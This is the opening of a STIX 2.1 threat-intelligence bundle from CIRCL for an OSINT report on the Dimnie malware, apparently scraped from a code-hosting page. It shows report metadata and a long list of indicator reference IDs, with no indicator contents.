42889 lines
No EOL
1.7 MiB
42889 lines
No EOL
1.7 MiB
{
|
|
"type": "bundle",
|
|
"id": "bundle--58db5ea0-8440-4687-b86f-4dd4950d210f",
|
|
"objects": [
|
|
{
|
|
"type": "identity",
|
|
"spec_version": "2.1",
|
|
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:23:30.000Z",
|
|
"modified": "2017-03-29T09:23:30.000Z",
|
|
"name": "CIRCL",
|
|
"identity_class": "organization"
|
|
},
|
|
{
|
|
"type": "report",
|
|
"spec_version": "2.1",
|
|
"id": "report--58db5ea0-8440-4687-b86f-4dd4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:23:30.000Z",
|
|
"modified": "2017-03-29T09:23:30.000Z",
|
|
"name": "OSINT - Dimnie: Hiding in Plain Sight",
|
|
"published": "2017-03-29T09:58:08Z",
|
|
"object_refs": [
|
|
"x-misp-attribute--58db5edc-bcec-457a-94bf-4193950d210f",
|
|
"observed-data--58db5ef2-1c88-4619-a463-4a93950d210f",
|
|
"url--58db5ef2-1c88-4619-a463-4a93950d210f",
|
|
"indicator--58db5f2c-1388-45e6-a06a-4b8e950d210f",
|
|
"indicator--58db5f2d-22e4-496a-a8aa-42a5950d210f",
|
|
"indicator--58db5f2e-379c-4f62-a1c5-4391950d210f",
|
|
"indicator--58db5f2f-5ee8-4072-a956-4b1d950d210f",
|
|
"indicator--58db5fa7-1314-465d-85cb-4174950d210f",
|
|
"indicator--58db5fa8-c028-4da9-8b3a-4ac3950d210f",
|
|
"indicator--58db5fa9-6b14-4401-96bc-4811950d210f",
|
|
"indicator--58db5faa-5608-420c-83ba-48e7950d210f",
|
|
"indicator--58db5fac-f740-48a1-92e1-4457950d210f",
|
|
"indicator--58db5fac-4f58-4b74-ba5b-4528950d210f",
|
|
"indicator--58db5fad-0708-44cd-b7cd-4d47950d210f",
|
|
"indicator--58db5fae-f69c-485a-98ff-4945950d210f",
|
|
"indicator--58db5fb0-7df8-453b-bfec-4770950d210f",
|
|
"indicator--58db5fb0-d528-4d69-b25e-462c950d210f",
|
|
"indicator--58db5fb1-c30c-494e-a5c3-4dfe950d210f",
|
|
"indicator--58db5fb3-d000-4d27-bd68-41bb950d210f",
|
|
"indicator--58db5fb4-9678-40ec-90ee-41f1950d210f",
|
|
"indicator--58db5fb5-bad4-4a11-9dae-4550950d210f",
|
|
"indicator--58db5fb6-04e8-47c6-8e7e-45d5950d210f",
|
|
"indicator--58db5fb7-55a8-4897-8bce-4fe3950d210f",
|
|
"indicator--58db5fb8-3040-4381-85dc-4b0f950d210f",
|
|
"indicator--58db5fb9-2410-4dc6-a3c3-49b2950d210f",
|
|
"indicator--58db5fba-e40c-43d8-89ac-414b950d210f",
|
|
"indicator--58db5fbb-3694-4fa4-b961-4cd4950d210f",
|
|
"indicator--58db5fbc-5ed8-4934-9d8f-4596950d210f",
|
|
"indicator--58db5fbd-245c-4ffb-b806-4d63950d210f",
|
|
"indicator--58db5fbe-fb94-4c46-aaa0-44da950d210f",
|
|
"indicator--58db5fbe-6fb4-40ce-aef2-4a83950d210f",
|
|
"indicator--58db5fbf-f974-4045-a7a6-4c32950d210f",
|
|
"indicator--58db5fc0-fcdc-4381-a664-47b1950d210f",
|
|
"indicator--58db5fc1-5418-437c-a9c1-4fcc950d210f",
|
|
"indicator--58db5fc2-177c-4b74-bc5c-46c6950d210f",
|
|
"indicator--58db5fc3-7a0c-4d59-adf0-4902950d210f",
|
|
"indicator--58db5fc4-90a8-4c5c-951f-48a0950d210f",
|
|
"indicator--58db5fc5-d168-4597-b703-4752950d210f",
|
|
"indicator--58db5fc7-c5e0-45b5-a2d7-4b72950d210f",
|
|
"indicator--58db5fc8-5750-4b8a-9c23-42a0950d210f",
|
|
"indicator--58db5fc9-def0-4086-9662-4870950d210f",
|
|
"indicator--58db5fca-f838-4a30-844d-4a72950d210f",
|
|
"indicator--58db5fcb-2284-4785-9336-4828950d210f",
|
|
"indicator--58db5fcc-3e48-496a-979a-4e29950d210f",
|
|
"indicator--58db5fcc-74ec-4d81-85c2-45b6950d210f",
|
|
"indicator--58db5fcd-940c-4a86-9a1f-4d73950d210f",
|
|
"indicator--58db5fce-b2f4-46fc-ab5a-473a950d210f",
|
|
"indicator--58db5fcf-19b8-46e9-9e25-4031950d210f",
|
|
"indicator--58db6144-ec20-4cc0-b1ae-4e5a950d210f",
|
|
"indicator--58db6145-f6bc-4e54-aafc-47a5950d210f",
|
|
"indicator--58db6146-6dd4-43c5-b51b-49bc950d210f",
|
|
"indicator--58db6147-73f0-4661-8979-4164950d210f",
|
|
"indicator--58db6148-3588-481a-b04d-4919950d210f",
|
|
"indicator--58db614a-6c88-49cc-b715-4d7a950d210f",
|
|
"indicator--58db614a-10f4-4c1c-96f6-4f11950d210f",
|
|
"indicator--58db614b-fc28-4fe9-952c-4b61950d210f",
|
|
"indicator--58db614c-a2b8-464b-9440-4f52950d210f",
|
|
"indicator--58db614d-3d9c-4746-945c-44a4950d210f",
|
|
"indicator--58db614e-3084-4445-ad89-4eb0950d210f",
|
|
"indicator--58db614f-70f8-4305-af9d-4053950d210f",
|
|
"indicator--58db6150-dc28-4866-a771-45d5950d210f",
|
|
"indicator--58db6151-a804-4897-acd8-4b63950d210f",
|
|
"indicator--58db6151-91a4-40b4-a757-4062950d210f",
|
|
"indicator--58db6152-5bc4-4019-aab5-4e6a950d210f",
|
|
"indicator--58db6153-ee28-4920-b50c-4320950d210f",
|
|
"indicator--58db6154-d050-47bc-8f1c-4152950d210f",
|
|
"indicator--58db6155-ab14-4e15-80c0-44b4950d210f",
|
|
"indicator--58db6156-dd7c-4879-a1b6-4c7d950d210f",
|
|
"indicator--58db6157-cf74-43a4-a6a3-4288950d210f",
|
|
"indicator--58db6158-552c-4808-9724-468c950d210f",
|
|
"indicator--58db6158-7bc4-4dac-990f-4fab950d210f",
|
|
"indicator--58db6159-9c38-4837-ba60-4b79950d210f",
|
|
"indicator--58db615a-5b2c-435a-bcbf-4dc3950d210f",
|
|
"indicator--58db615b-4ca0-4ef4-a601-4cea950d210f",
|
|
"indicator--58db615c-f08c-458a-8e1a-45cd950d210f",
|
|
"indicator--58db615d-878c-4b50-8341-4ace950d210f",
|
|
"indicator--58db615e-6fb8-41d8-8683-4cae950d210f",
|
|
"indicator--58db615f-ab20-45e0-bee8-448d950d210f",
|
|
"indicator--58db615f-768c-46be-9dbd-4681950d210f",
|
|
"indicator--58db6160-e690-490f-8764-428c950d210f",
|
|
"indicator--58db6161-cef4-41fc-8ae7-4926950d210f",
|
|
"indicator--58db6162-3f54-4568-9e4c-4a89950d210f",
|
|
"indicator--58db6163-ac48-45cd-b687-4989950d210f",
|
|
"indicator--58db6164-6650-4431-b34a-44f3950d210f",
|
|
"indicator--58db6164-d070-4b6a-a9dd-4162950d210f",
|
|
"indicator--58db62ef-9be8-4beb-acb8-4567950d210f",
|
|
"indicator--58db62f0-51c4-41d3-b87d-421f950d210f",
|
|
"indicator--58db62f1-2db8-4ace-a9fa-4311950d210f",
|
|
"indicator--58db62f2-2690-4b36-8621-495d950d210f",
|
|
"indicator--58db62f3-1b54-4419-a0c7-4e49950d210f",
|
|
"indicator--58db62f4-7f44-49d1-9958-43b5950d210f",
|
|
"indicator--58db62f5-8b4c-4c00-bc3d-493f950d210f",
|
|
"indicator--58db62f6-174c-48fa-93f6-4d03950d210f",
|
|
"indicator--58db62f7-1fa8-4424-bf05-437d950d210f",
|
|
"indicator--58db62f8-43f4-4fcd-9c19-4dd1950d210f",
|
|
"indicator--58db62f9-e758-4b0e-9aac-4ff8950d210f",
|
|
"indicator--58db62fa-014c-4ab3-aad3-4972950d210f",
|
|
"indicator--58db62fb-6524-4312-8d68-466f950d210f",
|
|
"indicator--58db62fc-ccd4-4103-881d-483b950d210f",
|
|
"indicator--58db62fc-6ac4-4498-b69f-4ed6950d210f",
|
|
"indicator--58db62fd-3b00-49d0-a5de-433e950d210f",
|
|
"indicator--58db62fe-1840-4f50-849c-4a2a950d210f",
|
|
"indicator--58db62ff-5e04-4373-892c-44f7950d210f",
|
|
"indicator--58db6300-7df4-4455-ac4b-4dba950d210f",
|
|
"indicator--58db6301-0ba8-4fa4-8571-4b10950d210f",
|
|
"indicator--58db6302-6118-4c43-83c2-443f950d210f",
|
|
"indicator--58db6302-f4a4-493d-ad64-40e5950d210f",
|
|
"indicator--58db6303-2c1c-45fa-ba7d-4708950d210f",
|
|
"indicator--58db6304-531c-4be5-9345-459c950d210f",
|
|
"indicator--58db6305-964c-47d7-8c3b-4146950d210f",
|
|
"indicator--58db6306-b034-4995-b6be-4e9c950d210f",
|
|
"indicator--58db6307-840c-400b-8ec3-4b1e950d210f",
|
|
"indicator--58db6308-a274-4ccd-aa7a-42c6950d210f",
|
|
"indicator--58db6309-1b10-4a0f-a9d5-4e27950d210f",
|
|
"indicator--58db630a-abc0-4625-bfa3-4e12950d210f",
|
|
"indicator--58db630b-a1d8-42b1-b384-4dff950d210f",
|
|
"indicator--58db630c-5440-450b-9b9e-401a950d210f",
|
|
"indicator--58db630d-dca8-4942-8076-4ddd950d210f",
|
|
"indicator--58db630e-6318-41e3-9156-427b950d210f",
|
|
"indicator--58db630e-b0c4-4278-9da4-499c950d210f",
|
|
"indicator--58db630f-4c8c-4dc3-8acd-4ce5950d210f",
|
|
"indicator--58db6310-416c-439f-abf6-45a6950d210f",
|
|
"indicator--58db6311-0004-43a3-9d37-49c3950d210f",
|
|
"indicator--58db6312-4830-48a9-abcd-4a07950d210f",
|
|
"indicator--58db6313-5d9c-416b-a41d-4c3a950d210f",
|
|
"indicator--58db64ca-8378-48da-b38f-47c5950d210f",
|
|
"indicator--58db64cb-a0b8-4d2c-bf9f-4279950d210f",
|
|
"indicator--58db64cc-1530-43d8-9025-4b0a950d210f",
|
|
"indicator--58db64cd-3eb8-4103-abea-4260950d210f",
|
|
"indicator--58db64ce-4328-46f5-a0f6-4d3f950d210f",
|
|
"indicator--58db64cf-4260-4565-a8eb-41aa950d210f",
|
|
"indicator--58db64d0-8e7c-4a92-b109-4579950d210f",
|
|
"indicator--58db64d1-a254-426a-83fd-46bd950d210f",
|
|
"indicator--58db64d1-229c-4238-b3c1-41ae950d210f",
|
|
"indicator--58db64d2-8940-4a0f-9095-408e950d210f",
|
|
"indicator--58db64d3-d3e0-47a6-bc43-493d950d210f",
|
|
"indicator--58db64d4-c160-4fc2-9d78-4488950d210f",
|
|
"indicator--58db64d5-0198-42f4-9817-4f01950d210f",
|
|
"indicator--58db64d6-20b4-4432-b60c-4082950d210f",
|
|
"indicator--58db64d7-5c10-4c70-8024-4b12950d210f",
|
|
"indicator--58db64d8-4bec-44d8-962b-4284950d210f",
|
|
"indicator--58db64d9-eafc-4571-a2b9-4081950d210f",
|
|
"indicator--58db64d9-4ea0-4100-b330-422a950d210f",
|
|
"indicator--58db64da-d9a8-4c6d-b324-4cb8950d210f",
|
|
"indicator--58db64db-ebfc-4c61-8c52-4aaf950d210f",
|
|
"indicator--58db64dc-9b24-4a28-afa4-432e950d210f",
|
|
"indicator--58db64dd-8b3c-41ca-bd9c-403e950d210f",
|
|
"indicator--58db64de-b2bc-400e-beb7-4b11950d210f",
|
|
"indicator--58db64df-ab60-4507-8480-49eb950d210f",
|
|
"indicator--58db64df-4bc8-49ff-94a1-4a1f950d210f",
|
|
"indicator--58db64e0-f1c8-4ea3-b8a3-425b950d210f",
|
|
"indicator--58db64e1-1004-4ba8-843e-467c950d210f",
|
|
"indicator--58db64e2-1908-4d6e-b012-4de7950d210f",
|
|
"indicator--58db64e3-f848-48a6-9cc5-4933950d210f",
|
|
"indicator--58db64e4-7a60-4963-8440-46bc950d210f",
|
|
"indicator--58db64e5-e14c-4c3a-8a7c-4c06950d210f",
|
|
"indicator--58db64e6-9ce0-44b8-8b23-4d79950d210f",
|
|
"indicator--58db64e7-5c44-48a4-a318-4962950d210f",
|
|
"indicator--58db64e8-29d8-4b2d-9340-4291950d210f",
|
|
"indicator--58db64e8-7338-4c9d-a268-4345950d210f",
|
|
"indicator--58db64e9-b980-43cc-9c26-4e44950d210f",
|
|
"indicator--58db64ea-cbc0-421d-8764-459b950d210f",
|
|
"indicator--58db64eb-b2d4-46ce-8b21-4bc7950d210f",
|
|
"indicator--58db64ec-19e0-4376-b7ba-4be2950d210f",
|
|
"indicator--58db64ed-e888-4cef-9fe1-4455950d210f",
|
|
"indicator--58db64ee-ee5c-4bbb-b620-432a950d210f",
|
|
"indicator--58db64ef-bda0-4406-8454-468e950d210f",
|
|
"indicator--58db64ef-c7d8-4ccd-9d00-4fba950d210f",
|
|
"indicator--58db64f0-6df4-49e3-892f-49cf950d210f",
|
|
"indicator--58db64f1-8a5c-49ed-bfa5-4632950d210f",
|
|
"indicator--58db64f2-7c58-4d37-93e7-4f21950d210f",
|
|
"indicator--58db64f3-5e60-4d86-8002-4d5f950d210f",
|
|
"indicator--58db64f4-3d68-44aa-bb0a-4ced950d210f",
|
|
"indicator--58db64f5-a31c-49e8-92f1-4308950d210f",
|
|
"indicator--58db64f6-78ec-4b61-83f5-4886950d210f",
|
|
"indicator--58db64f7-7eb0-47e6-b824-49e0950d210f",
|
|
"indicator--58db64f9-9830-4929-8ed6-42ee950d210f",
|
|
"indicator--58db64fa-0100-44b6-ac46-4f21950d210f",
|
|
"indicator--58db64fb-8e60-4c65-a20b-42e1950d210f",
|
|
"indicator--58db64fc-f580-4e40-babe-4d9e950d210f",
|
|
"indicator--58db64fd-f314-47e7-81f0-4f93950d210f",
|
|
"indicator--58db64fe-9044-43a9-9046-4d59950d210f",
|
|
"indicator--58db64fe-5538-403d-abe4-4488950d210f",
|
|
"indicator--58db64ff-14b4-4812-915d-47e4950d210f",
|
|
"indicator--58db6500-3944-4172-9d0b-4c5e950d210f",
|
|
"indicator--58db694b-bad0-4a88-bc1f-44f5950d210f",
|
|
"indicator--58db694c-694c-4317-853b-4cba950d210f",
|
|
"indicator--58db694d-ced0-4a90-aa26-46bb950d210f",
|
|
"indicator--58db694e-8914-49ff-acc6-4d51950d210f",
|
|
"indicator--58db694f-ce48-425c-a1fc-41c2950d210f",
|
|
"indicator--58db6950-153c-45d2-9ae3-4995950d210f",
|
|
"indicator--58db6950-1d98-4d84-91ba-4cec950d210f",
|
|
"indicator--58db6951-ac78-4785-8144-4ff7950d210f",
|
|
"indicator--58db6952-3f38-4c6a-bc3f-461b950d210f",
|
|
"indicator--58db6953-e224-47c3-a633-4336950d210f",
|
|
"indicator--58db6954-5a6c-4ea0-9776-4aad950d210f",
|
|
"indicator--58db6955-5dfc-42a5-8f0e-4141950d210f",
|
|
"indicator--58db6956-b0a8-4698-a845-4164950d210f",
|
|
"indicator--58db6957-2d48-4a3a-af3d-4ecc950d210f",
|
|
"indicator--58db6958-260c-4991-9fb8-40f4950d210f",
|
|
"indicator--58db6959-e204-4536-8d43-4119950d210f",
|
|
"indicator--58db695a-efbc-4f04-baad-4cc2950d210f",
|
|
"indicator--58db695b-2f20-4953-9eae-4b58950d210f",
|
|
"indicator--58db695c-4a90-42da-89cf-4e74950d210f",
|
|
"indicator--58db695d-0600-4509-abbd-43f9950d210f",
|
|
"indicator--58db695e-8f70-4408-8c99-4b0e950d210f",
|
|
"indicator--58db695f-dcac-4c2e-88a6-4e1a950d210f",
|
|
"indicator--58db6960-4d8c-4651-9af9-4428950d210f",
|
|
"indicator--58db6961-64e4-4de0-a6f4-436d950d210f",
|
|
"indicator--58db6962-6800-4605-9db9-420e950d210f",
|
|
"indicator--58db6963-40c8-439f-80f3-4d9b950d210f",
|
|
"indicator--58db6964-574c-43c9-a14d-4dd7950d210f",
|
|
"indicator--58db6965-bc98-415f-ab7d-487f950d210f",
|
|
"indicator--58db6966-c3f8-4381-824a-4714950d210f",
|
|
"indicator--58db6967-c874-489f-8e71-4f4b950d210f",
|
|
"indicator--58db6968-af58-407f-a93f-4a67950d210f",
|
|
"indicator--58db6969-d994-4694-b173-467f950d210f",
|
|
"indicator--58db696a-c434-4a94-a105-48bf950d210f",
|
|
"indicator--58db696b-0120-4099-9388-415e950d210f",
|
|
"indicator--58db696c-ce08-46d8-8a90-4df5950d210f",
|
|
"indicator--58db696d-a4d4-49b4-81a5-4055950d210f",
|
|
"indicator--58db696e-451c-44a5-864e-4805950d210f",
|
|
"indicator--58db696f-dfdc-4cdc-84e5-44b4950d210f",
|
|
"indicator--58db6970-ceec-400b-9bff-4172950d210f",
|
|
"indicator--58db6971-fdec-46e1-9df4-4c37950d210f",
|
|
"indicator--58db6972-743c-49d1-90fd-4ec6950d210f",
|
|
"indicator--58db6973-fdc0-43b7-85c1-4268950d210f",
|
|
"indicator--58db6974-3958-4435-8a25-473b950d210f",
|
|
"indicator--58db6975-3d20-4f27-bb3c-4760950d210f",
|
|
"indicator--58db6976-e1c8-485d-b672-4f3e950d210f",
|
|
"indicator--58db6977-6ae4-4d96-8357-4b96950d210f",
|
|
"indicator--58db6978-2d90-4429-8cf7-494d950d210f",
|
|
"indicator--58db6979-fce4-4edb-b084-43e5950d210f",
|
|
"indicator--58db6979-9f18-4527-8e45-4e1f950d210f",
|
|
"indicator--58db697a-3928-4ca0-8fdf-481f950d210f",
|
|
"indicator--58db697b-6cf4-47ab-9888-42ec950d210f",
|
|
"indicator--58db697c-97b0-48b5-84ef-4250950d210f",
|
|
"indicator--58db697d-9ae8-483d-a894-4d9e950d210f",
|
|
"indicator--58db697e-35c8-4e4a-a9c7-4f32950d210f",
|
|
"indicator--58db697f-eb34-4075-8fac-43ae950d210f",
|
|
"indicator--58db6980-855c-42cc-a42c-4674950d210f",
|
|
"indicator--58db6981-3534-4b92-b53d-4b5f950d210f",
|
|
"indicator--58db6982-72ec-49bd-a685-4e6e950d210f",
|
|
"indicator--58db6983-70c4-4edf-aae8-4b0a950d210f",
|
|
"indicator--58db6983-0dd4-4f5b-8cd1-4bbd950d210f",
|
|
"indicator--58db6984-f7e0-4088-be90-4bfb950d210f",
|
|
"indicator--58db6985-efe4-4cf3-bceb-4ed4950d210f",
|
|
"indicator--58db6986-0b88-48cb-aa93-4073950d210f",
|
|
"indicator--58db6987-f7e4-4872-9f9a-4d01950d210f",
|
|
"indicator--58db6988-5dc4-4a0e-9c1b-4cf1950d210f",
|
|
"indicator--58db6989-9fb4-4542-b2da-4c7a950d210f",
|
|
"indicator--58db698a-d358-40f7-9c86-4f6e950d210f",
|
|
"indicator--58db698b-8234-418e-9f7d-4b92950d210f",
|
|
"indicator--58db698c-43e0-449e-828b-4f2d950d210f",
|
|
"indicator--58db698d-f5f4-481c-8c67-4586950d210f",
|
|
"indicator--58db698e-7ff0-4014-8910-4ac1950d210f",
|
|
"indicator--58db698f-962c-4bf0-958a-4b2d950d210f",
|
|
"indicator--58db6990-6d90-4066-8251-42a7950d210f",
|
|
"indicator--58db6991-5684-4a23-af26-413b950d210f",
|
|
"indicator--58db6992-9d64-4759-927e-4588950d210f",
|
|
"indicator--58db6993-e718-40e5-b1ca-45e3950d210f",
|
|
"indicator--58db6994-7b00-45e9-9981-4d03950d210f",
|
|
"indicator--58db6995-bb98-4e4e-becb-4faa950d210f",
|
|
"indicator--58db6996-d2c0-4e13-a6f4-4e88950d210f",
|
|
"indicator--58db6997-6834-407d-abd8-475f950d210f",
|
|
"indicator--58db6998-1d4c-4602-8a38-442a950d210f",
|
|
"indicator--58db6999-ab24-4113-83a0-43e1950d210f",
|
|
"indicator--58db699a-c11c-422a-ad13-45fb950d210f",
|
|
"indicator--58db699b-5440-432b-bd89-4a6f950d210f",
|
|
"indicator--58db699c-3b70-4c81-9cf8-4f24950d210f",
|
|
"indicator--58db699d-5e18-44e6-b953-4ac9950d210f",
|
|
"indicator--58db699e-c1ac-4f9a-a18b-4249950d210f",
|
|
"indicator--58db699f-d250-471d-b333-431c950d210f",
|
|
"indicator--58db69a0-3ac4-41f9-a11b-4379950d210f",
|
|
"indicator--58db69a1-0c08-458a-90ce-40cb950d210f",
|
|
"indicator--58db69a2-d614-4433-82f9-4cc8950d210f",
|
|
"indicator--58db69a3-dd5c-4b68-b49c-483f950d210f",
|
|
"indicator--58db69a4-791c-4925-87bb-4161950d210f",
|
|
"indicator--58db69a5-ef58-4f1c-b4e2-4910950d210f",
|
|
"indicator--58db69a6-73e4-4493-8762-4133950d210f",
|
|
"indicator--58db69a7-5d64-4ad8-927d-4e54950d210f",
|
|
"indicator--58db69a8-47ac-4e84-88e9-49f5950d210f",
|
|
"indicator--58db69a9-1778-4086-a145-4b0e950d210f",
|
|
"indicator--58db69aa-cb88-4d61-833f-4efa950d210f",
|
|
"indicator--58db69ab-d46c-4c3c-8344-4e79950d210f",
|
|
"indicator--58db69ac-b5d4-4180-b0fd-49a9950d210f",
|
|
"indicator--58db69ad-42a4-4072-91f4-4e63950d210f",
|
|
"indicator--58db69ae-171c-4af3-be3b-435b950d210f",
|
|
"indicator--58db69b0-3a58-4a94-9244-4fd2950d210f",
|
|
"indicator--58db69b1-d35c-4a5a-af85-47f7950d210f",
|
|
"indicator--58db69b1-1ea8-49de-b5c7-47ed950d210f",
|
|
"indicator--58db69b2-5e70-4efa-9bf6-4cdc950d210f",
|
|
"indicator--58db69b3-c0ac-4d42-8c0a-41c1950d210f",
|
|
"indicator--58db69b4-3eb0-46e1-945c-4dab950d210f",
|
|
"indicator--58db69b5-fd04-4b5d-9427-44e4950d210f",
|
|
"indicator--58db69b6-2c20-4823-8bd7-40cd950d210f",
|
|
"indicator--58db69b7-cd48-47f1-8d80-4545950d210f",
|
|
"indicator--58db69b8-b0ac-4f54-af8a-46c5950d210f",
|
|
"indicator--58db69b9-59c0-437a-b7d5-40f9950d210f",
|
|
"indicator--58db69ba-c304-4278-9274-47ed950d210f",
|
|
"indicator--58db69bb-60a8-4feb-bf32-4b73950d210f",
|
|
"indicator--58db69bc-4664-4b60-90bc-4446950d210f",
|
|
"indicator--58db69bd-052c-41d3-aae9-4290950d210f",
|
|
"indicator--58db69be-92a8-43a4-800d-42bd950d210f",
|
|
"indicator--58db69bf-eb1c-435c-92fa-4cc9950d210f",
|
|
"indicator--58db69c0-a72c-4196-822c-4abb950d210f",
|
|
"indicator--58db69c1-e834-4110-92a7-403f950d210f",
|
|
"indicator--58db69c2-72f4-4147-b8cf-44f9950d210f",
|
|
"indicator--58db69c3-ec6c-4ed9-8264-45c7950d210f",
|
|
"indicator--58db69c4-be24-421b-be02-4f32950d210f",
|
|
"indicator--58db69c5-9244-4baa-8c79-4d98950d210f",
|
|
"indicator--58db69c6-008c-44f5-9d8b-47f7950d210f",
|
|
"indicator--58db69c7-4db8-43c0-9445-462d950d210f",
|
|
"indicator--58db69c8-abe0-42ae-8323-4668950d210f",
|
|
"indicator--58db69c9-ea78-4d06-9105-47ef950d210f",
|
|
"indicator--58db69ca-5bac-4c6e-8895-4d03950d210f",
|
|
"indicator--58db69cb-dacc-43f1-96ab-4509950d210f",
|
|
"indicator--58db69cc-4cb8-4d3c-8678-484e950d210f",
|
|
"indicator--58db69ce-2568-4665-aedf-4823950d210f",
|
|
"indicator--58db69cf-e7cc-4978-8e8f-447b950d210f",
|
|
"indicator--58db69d0-c930-4ad4-b12b-4efb950d210f",
|
|
"indicator--58db69d1-d34c-4e37-98d9-4fc5950d210f",
|
|
"indicator--58db69d2-c330-42a5-80bd-4c0a950d210f",
|
|
"indicator--58db69d3-99a4-43c5-af9b-4747950d210f",
|
|
"indicator--58db69d4-5e48-4460-92c7-4aaf950d210f",
|
|
"indicator--58db69d5-4048-469f-9eca-4e8d950d210f",
|
|
"indicator--58db69d6-b5d4-4780-b8e0-4f4f950d210f",
|
|
"indicator--58db69d7-5b14-4404-a887-4e8e950d210f",
|
|
"indicator--58db69d8-b7cc-4c18-b88a-41e4950d210f",
|
|
"indicator--58db69d9-7a88-47e7-a192-4ab0950d210f",
|
|
"indicator--58db69da-2b04-4df8-b3f8-4c5d950d210f",
|
|
"indicator--58db69db-4dd0-4a9e-89b9-407d950d210f",
|
|
"indicator--58db69dc-7f6c-4779-a15b-414a950d210f",
|
|
"indicator--58db69dd-e124-4b97-bd97-43cb950d210f",
|
|
"indicator--58db69de-ca20-412f-ac2e-4bb8950d210f",
|
|
"indicator--58db69df-69bc-4b73-8220-4e24950d210f",
|
|
"indicator--58db69e1-1f40-448b-9961-4a53950d210f",
|
|
"indicator--58db69e2-7a9c-4384-8504-42da950d210f",
|
|
"indicator--58db69e3-ccac-483b-accc-483f950d210f",
|
|
"indicator--58db69e4-996c-4da1-8483-4de1950d210f",
|
|
"indicator--58db69e5-8a78-4249-b619-41a0950d210f",
|
|
"indicator--58db69e6-b744-4fa1-a8e4-457b950d210f",
|
|
"indicator--58db69e7-6748-4b5c-a2c6-4154950d210f",
|
|
"indicator--58db69e8-1180-4736-bccf-4fb5950d210f",
|
|
"indicator--58db69e9-6154-457d-8f82-409c950d210f",
|
|
"indicator--58db69ea-e660-434c-9e00-4462950d210f",
|
|
"indicator--58db69ec-adac-45b3-a6c7-4ee0950d210f",
|
|
"indicator--58db69ed-fa50-41fe-9034-4ac3950d210f",
|
|
"indicator--58db69ee-a6c0-4078-815c-42a1950d210f",
|
|
"indicator--58db69ef-8140-4012-8d68-4062950d210f",
|
|
"indicator--58db69f0-6b60-408f-93d7-40f2950d210f",
|
|
"indicator--58db69f1-42e4-46d0-9d9d-4eba950d210f",
|
|
"indicator--58db69f2-5bcc-488b-9237-42bc950d210f",
|
|
"indicator--58db69f3-4d98-491f-9a3f-41fa950d210f",
|
|
"indicator--58db69f4-bc74-4e60-8258-44cb950d210f",
|
|
"indicator--58db69f5-1da4-4d67-b360-441c950d210f",
|
|
"indicator--58db69f6-cfc8-4d0c-9aae-4e5c950d210f",
|
|
"indicator--58db69f7-cb7c-40cf-9f3e-45a7950d210f",
|
|
"indicator--58db69f9-09e4-404e-8592-4b62950d210f",
|
|
"indicator--58db69fa-bbf8-426f-b5e5-449a950d210f",
|
|
"indicator--58db69fb-af00-443c-925a-4bf8950d210f",
|
|
"indicator--58db69fc-f64c-486f-9536-4e18950d210f",
|
|
"indicator--58db69fd-e3b4-4945-a6be-4d8f950d210f",
|
|
"indicator--58db69fe-6244-43b0-8c98-4b56950d210f",
|
|
"indicator--58db69ff-ae18-4801-a000-41bd950d210f",
|
|
"indicator--58db6a00-edcc-466d-aade-4de5950d210f",
|
|
"indicator--58db6a01-1aac-4baa-b649-4d05950d210f",
|
|
"indicator--58db6a02-8ad0-419c-8fb4-4210950d210f",
|
|
"indicator--58db6a03-9dac-4ef1-87e0-4c74950d210f",
|
|
"indicator--58db6a05-99e8-4ca5-8ee8-465f950d210f",
|
|
"indicator--58db6a06-5d70-4939-bf68-4a2d950d210f",
|
|
"indicator--58db6a07-5bdc-4ad9-a963-4531950d210f",
|
|
"indicator--58db6a08-c7a4-40a2-b069-4dcc950d210f",
|
|
"indicator--58db6a09-da50-44f8-a65d-430a950d210f",
|
|
"indicator--58db6a0a-dc3c-446c-9f94-40a6950d210f",
|
|
"indicator--58db6a0b-2fc4-468f-9650-4f96950d210f",
|
|
"indicator--58db6a0c-2758-4c70-8284-48e2950d210f",
|
|
"indicator--58db6a0d-1140-4eb8-895a-4aa9950d210f",
|
|
"indicator--58db6a0f-3400-48d2-a7fb-4500950d210f",
|
|
"indicator--58db6a10-2040-4f3d-b9a8-4d69950d210f",
|
|
"indicator--58db6a11-a804-4f3f-ac79-44d4950d210f",
|
|
"indicator--58db6a12-5104-466f-9ccd-4ee7950d210f",
|
|
"indicator--58db6a13-c044-4f4b-8fa6-4389950d210f",
|
|
"indicator--58db6a14-0a58-4371-8cd8-4ba1950d210f",
|
|
"indicator--58db6a15-cebc-4608-990f-4e22950d210f",
|
|
"indicator--58db6a16-77e0-48db-86b2-478c950d210f",
|
|
"indicator--58db6a18-0504-484b-8814-49d0950d210f",
|
|
"indicator--58db6a19-17d4-4688-bbf6-461f950d210f",
|
|
"indicator--58db6a1a-c044-4c69-8fb1-4d48950d210f",
|
|
"indicator--58db6a1b-6e4c-4c0c-a612-4e99950d210f",
|
|
"indicator--58db6a1d-af38-4614-9f1e-4aef950d210f",
|
|
"indicator--58db6a1e-3660-4168-80f5-4e6b950d210f",
|
|
"indicator--58db6a1f-4a70-4bdd-8e68-4aa8950d210f",
|
|
"indicator--58db6a20-6174-483d-ac35-44b7950d210f",
|
|
"indicator--58db6a21-2354-400a-b048-497a950d210f",
|
|
"indicator--58db6a22-a3a4-4661-b930-473d950d210f",
|
|
"indicator--58db6a23-ed90-4a30-8a1d-41cb950d210f",
|
|
"indicator--58db6a24-6b08-4b9b-a074-460b950d210f",
|
|
"indicator--58db6a25-3654-4cfa-91f7-4cfb950d210f",
|
|
"indicator--58db6a27-09ac-4997-a854-442e950d210f",
|
|
"indicator--58db6a28-24c4-482a-8720-47af950d210f",
|
|
"indicator--58db6a29-30d0-48f5-96de-417e950d210f",
|
|
"indicator--58db6a2a-e610-4bc1-8ef4-4096950d210f",
|
|
"indicator--58db6a2b-29dc-4ae3-991c-4507950d210f",
|
|
"indicator--58db6a2c-8374-4020-906d-415b950d210f",
|
|
"indicator--58db6a2d-c998-4841-8539-43e1950d210f",
|
|
"indicator--58db6a2e-d414-4fb6-97ed-49dd950d210f",
|
|
"indicator--58db6a2f-aca0-4f33-af9f-4e7c950d210f",
|
|
"indicator--58db6a30-b940-49c9-bdb4-48f0950d210f",
|
|
"indicator--58db6a31-fc68-496b-862d-4857950d210f",
|
|
"indicator--58db6a33-7870-4c60-83b8-4d87950d210f",
|
|
"indicator--58db6a34-1218-4673-b712-4ad7950d210f",
|
|
"indicator--58db6bae-10d8-44ae-915e-41c6950d210f",
